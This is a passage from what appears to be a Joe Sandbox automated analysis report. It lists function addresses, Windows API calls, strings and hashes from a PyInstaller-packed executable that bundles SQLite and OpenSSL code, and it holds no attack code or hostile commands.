Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
Instruction ID: f29f0fb67ac1866a42dd6160b06a30ee706c458277aba1d7a05b8fdeca8e2c85
Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
Instruction Fuzzy Hash: 0531C221619AD545EF219B29E8507AE639AEF84BE0F440271EF6DC7BC9EF3CD6418700

Function 00007FF6BA3A2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6BA3A28EA

Strings

[PYI-%d:%ls] , xrefs: 00007FF6BA3A2868
Error, xrefs: 00007FF6BA3A28DD
ERROR, xrefs: 00007FF6BA3A286F

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: 3242eb4e7a23a38344cd68c91a2b22a657e0197ac3394b977aafa74767134204
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: FC21A172B08B5182E7109B59F8847EA73A5FB88780F404136EF8DD7666EE3CD245C740

Function 00007FF6BA3BC5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6BA3BC61F
WriteFile.KERNEL32 ref: 00007FF6BA3BC8E7
WriteFile.KERNEL32 ref: 00007FF6BA3BC92D
GetLastError.KERNEL32 ref: 00007FF6BA3BC9E3

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: 0ef953d58a3e27de98cccb82c67664fab58bd63d88ef1e527bfa9560445a74cb
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: 21D11672B18A8189E721CF79D4402AC77B2FB59798B884276DF5ED7B99DE38D406C300

Function 00007FFDFB10DB10 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB10DBF7
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB10DC4B
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB10DCA7
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB10DD27

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID:
API String ID: 2142204133-0
Opcode ID: 35c5d2ddfb0390e77b5fc4b97464002024ab7fc143e77e726d05edeed6224623
Instruction ID: 1b9db26d39675aac39c907a011138455c13be1779ce8c79068f2721a65db6fc8
Opcode Fuzzy Hash: 35c5d2ddfb0390e77b5fc4b97464002024ab7fc143e77e726d05edeed6224623
Instruction Fuzzy Hash: 2791DF72F0A74B86EB259A129560A393690FB45BE4F4D5234EEBD4B7E9DF3CE0508300

Function 00007FF6BA3BCF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BA3BCF4B), ref: 00007FF6BA3BD07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BA3BCF4B), ref: 00007FF6BA3BD107

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: ec586eb8924886d0c864ad17c5384adf69ef9668bb76eb356cde9310a985e9e8
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: AE91B432F18A5289F7A09F6D94402BD6BA2AB44BC8F9442B5DF0ED7A94DF3CD442C700

Function 00007FF6BA3BF98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6BA3BFA7C
_get_daylight.LIBCMT ref: 00007FF6BA3BFA8D
_get_daylight.LIBCMT ref: 00007FF6BA3BFA9E
_isindst.LIBCMT ref: 00007FF6BA3BFB69

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: 139b0b010e53845ffc32afde63b358dd77c2607c0f7643788c5621ac30eed665
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: 6C51D272F04A118BEB18CF6C99556BC27A2AB44369F901375DF1ED2AE5DF39E406C700

Function 00007FF6BA3B577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6BA3B57AF
GetFileInformationByHandle.KERNEL32 ref: 00007FF6BA3B5811
GetLastError.KERNEL32 ref: 00007FF6BA3B58A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BA3B56B4), ref: 00007FF6BA3B58EE

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction ID: 5ab84bcfd6b32d117b449bbad918289ce3c76e6614392b6939ed3afa7ea1916f
Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction Fuzzy Hash: 61514922F08A418AFB50DF79D4503BD37A2AB48B98F549675EF4ADB689DF38D4818700

Function 00007FFDFB1240F0 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB124165
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB124189
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB1241A8
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB1241C0

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID:
API String ID: 2142204133-0
Opcode ID: f156c778602553fb8e6ad486ebff7de94d5ca6f9ee5b8a755dbaf2d72c8b4207
Instruction ID: 8c9affa16d47de5e0ea703df6936b269d9f60b8099f5297b1b8a7456ec9272ad
Opcode Fuzzy Hash: f156c778602553fb8e6ad486ebff7de94d5ca6f9ee5b8a755dbaf2d72c8b4207
Instruction Fuzzy Hash: 7A218C62B0A74283D724AB16B5624BAB3A1FB447C4B085131DFDE4BFAACF2CE051C300

Function 00007FF6BA3A20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6BA3A20F4
SetWindowLongPtrW.USER32 ref: 00007FF6BA3A2116
GetWindowLongPtrW.USER32 ref: 00007FF6BA3A2140
InvalidateRect.USER32 ref: 00007FF6BA3A2160

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 7679ec17063924541901481bf07df1987c0fea6410c096e0297fb8c568833bea
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 9911C821F1C16682FE549BAEE9852BD5293EF88780F888071DF49C7BA9DD3DD8D58700

Function 00007FFDFA932E0C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFDFA932E38
GetCurrentThreadId.KERNEL32 ref: 00007FFDFA932E46
GetCurrentProcessId.KERNEL32 ref: 00007FFDFA932E52
QueryPerformanceCounter.KERNEL32 ref: 00007FFDFA932E62

Memory Dump Source

Source File: 00000001.00000002.2254958100.00007FFDFA931000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFA930000, based on PE: true

Associated: 00000001.00000002.2254926278.00007FFDFA930000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA97A000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA988000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9DC000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9DF000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2255290926.00007FFDFA9E0000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2255326893.00007FFDFA9E2000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfa930000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
Instruction ID: a790f9ccd6bd2f40fd017df60e58d79c38b637f826c5df6bf70c5a3c406fe3da
Opcode Fuzzy Hash: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
Instruction Fuzzy Hash: 02111C26B14B018AEB008F61E8656B933B4FB19758F840A35DA7D86BA8DF78D1A48340

Function 00007FFDFAB2ECE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFDFAB2ED0C
GetCurrentThreadId.KERNEL32 ref: 00007FFDFAB2ED1A
GetCurrentProcessId.KERNEL32 ref: 00007FFDFAB2ED26
QueryPerformanceCounter.KERNEL32 ref: 00007FFDFAB2ED36

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
Instruction ID: b5be59fc79f854b9e59ddfe0761b06d007c9d05bcaf2a02889803263b0ac3605
Opcode Fuzzy Hash: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
Instruction Fuzzy Hash: F9112132B14F0189EB00CFA0E8556B833A4FB19759F440E75DA6D87798EF78E1948340

Function 00007FF6BA3AD010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6BA3AD03C
GetCurrentThreadId.KERNEL32 ref: 00007FF6BA3AD04A
GetCurrentProcessId.KERNEL32 ref: 00007FF6BA3AD056
QueryPerformanceCounter.KERNEL32 ref: 00007FF6BA3AD066

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: 76e6d5358ccfd4d67dad92eb48791a992a72e30a35c3a726a8f86720c62717aa
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: 30110322B14B168AEB009F65E8542A973A4FB59758F440E31EF6DC67A4EF7CD198C340

Function 00007FFDFB0FDC84 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0FE011

Strings

out of memory, xrefs: 00007FFDFB102478
string or blob too big, xrefs: 00007FFDFB102103

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: out of memory$string or blob too big
API String ID: 2142204133-2410398255
Opcode ID: 5fff3d06d0ccca3e7037c2f42f265a36d380444e00bc8815e5caa4a52cafd409
Instruction ID: 1f37cdde795ac384665e2f36750e005d842ec1aae1df867e1dcbe8657fb66a29
Opcode Fuzzy Hash: 5fff3d06d0ccca3e7037c2f42f265a36d380444e00bc8815e5caa4a52cafd409
Instruction Fuzzy Hash: 23C1C162F0A6C386FB209A15C160B7C6BA1EF12B84F144235CB6E577F9DF2CE446A350

Function 00007FFDFAAB1A05 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 283COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDFAAC0C5B

Strings

d2i_SSL_SESSION, xrefs: 00007FFDFAAC0AC2, 00007FFDFAAC0B47, 00007FFDFAAC0B88, 00007FFDFAAC0DA2
..\s\ssl\ssl_asn1.c, xrefs: 00007FFDFAAC0ACE, 00007FFDFAAC0B53, 00007FFDFAAC0B94, 00007FFDFAAC0D34, 00007FFDFAAC0DAE, 00007FFDFAAC0DFA, 00007FFDFAAC0E6F

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
API String ID: 3568877910-384499812
Opcode ID: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
Instruction ID: 13249d70c78833e27b888f2b452752125fd81509b419a72801f12e0ee38f37c6
Opcode Fuzzy Hash: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
Instruction Fuzzy Hash: 20D15D32B08B4292EB59DF25D5A0AB933A4FB44B84F458076DE6C477D9DF38E466C310

Function 00007FFDFAAB2126 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 268COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDFAADF76D

Strings

..\s\ssl\ssl_sess.c, xrefs: 00007FFDFAADF73E, 00007FFDFAADF7E0, 00007FFDFAADF890
ssl_get_prev_session, xrefs: 00007FFDFAADF732, 00007FFDFAADF7D4, 00007FFDFAADF884

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
API String ID: 3568877910-1331951588
Opcode ID: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
Instruction ID: ba1759f32b4308751b6667a09460a46e98e5c8fc7fd6a75e7fdf32a2e55392e1
Opcode Fuzzy Hash: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
Instruction Fuzzy Hash: 7AC18F22B0868282E76D9B21D564BBE7390FB84B88F444176DEAD477D9CF3DE45AC310

Function 00007FFDFB10CE50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB10D0E0

Strings

too many SQL variables, xrefs: 00007FFDFB10D102
variable number must be between ?1 and ?%d, xrefs: 00007FFDFB10CFF6

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: too many SQL variables$variable number must be between ?1 and ?%d
API String ID: 2142204133-515162456
Opcode ID: 506eda038b74c98e54bdfa24872a0cb727f6532326f914921bbb369657e19773
Instruction ID: ddb5c7676994126754628fd50cdf6aec016fe4f1c04503265d8febc4cf62d5f3
Opcode Fuzzy Hash: 506eda038b74c98e54bdfa24872a0cb727f6532326f914921bbb369657e19773
Instruction Fuzzy Hash: B3817AB3F0A65B85EB109B11E464AB977A5FB54BC8F498031DE9C476E8EF38E541C700

Function 00007FFDFB12A8B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB12A95D

Strings

BINARY, xrefs: 00007FFDFB12A8BC
no such collation sequence: %s, xrefs: 00007FFDFB12AAFC

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
